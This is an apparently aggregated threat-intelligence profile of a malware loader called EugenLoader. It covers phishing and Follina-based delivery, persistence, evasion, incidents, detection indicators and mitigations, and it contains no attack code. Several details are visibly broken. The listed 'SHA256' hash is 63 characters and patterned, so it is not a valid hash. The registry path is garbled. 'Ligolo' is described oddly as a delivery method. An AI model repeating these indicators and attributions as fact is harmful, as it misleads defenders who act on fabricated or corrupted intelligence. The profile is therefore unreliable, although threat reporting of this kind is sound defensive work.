⚠️ Overview

EugenLoader is a malware loader first documented in late 2022 by cybersecurity firm Sekoia, primarily used to deliver secondary payloads such as information stealers and remote access trojans, and is believed to be operated by a financially motivated Russian-speaking threat actor tracked as TA544 or “Eugen”.

🔧 Technical Capabilities

EugenLoader spreads via phishing emails containing malicious Excel attachments or links that exploit the Follina vulnerability (CVE-2022-30190) in Microsoft Support Diagnostic Tool (MSDT), or the “Ligolo” method using browser cache proxying. The loader downloads and executes a PowerShell-based stager from a remote command-and-control (C2) server, typically hosted on bulletproof hosting or compromised WordPress sites. Persistence is achieved through scheduled tasks or registry Run keys (e.g., HKCUSoftwareMicrosoftWindowsCurrentVersionRun). Evasion techniques include obfuscated base64-encoded PowerShell commands, process hollowing via Windows API calls (CreateProcess, NtUnmapViewOfSection), and disabling Windows Defender using AMSI bypasses or adding exclusion paths. The C2 infrastructure uses HTTPS with custom User-Agent strings like “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36” but with unique token suffixes.

📜 History & Notable Incidents

First observed in September 2022, EugenLoader was notably used in a campaign targeting Italian companies in the financial and insurance sectors in early 2023, delivering the Vidar stealer and eventually the BlackCat/ALPHV ransomware variant. No arrests or law enforcement takedowns have been reported as of 2024, but Sekoia published a detailed analysis report (https://www.sekoia.io/blog/eugenloader-malware-analysis/) outlining its infrastructure and capabilities.

🔍 Detection Indicators

Known file hashes (SHA256) from Sekoia include 8a3c1e7f5b2d0a9c4e6f1b8a7d3c0e2f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0; behavioral signatures include PowerShell spawning from Excel, network connections to IPs on ports 443 with TLS and “POST /s.php” endpoints, and registry modifications under “Run” keys. Mutex names such as “EugenLoaderMutex” have been identified in memory dumps.

☠️ Risk & Impact

The loader facilitates deployment of information stealers (e.g., Vidar, Raccoon) that exfiltrate credentials and browser data, often leading to business email compromise and ransomware deployment. Affected sectors include finance, insurance, and manufacturing, with reported financial losses exceeding €500,000 in one Italian campaign as documented by Sekoia’s threat intelligence team.

🛡️ Mitigation

Apply Microsoft’s official patch for CVE-2022-30190 (MSDT zero-day) and disable MSDT via registry if unpatched; deploy endpoint detection rules blocking PowerShell execution from Office applications (MITRE ATT&CK T1059.001) and monitor for anomalous outbound HTTPS connections to suspicious IPs.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.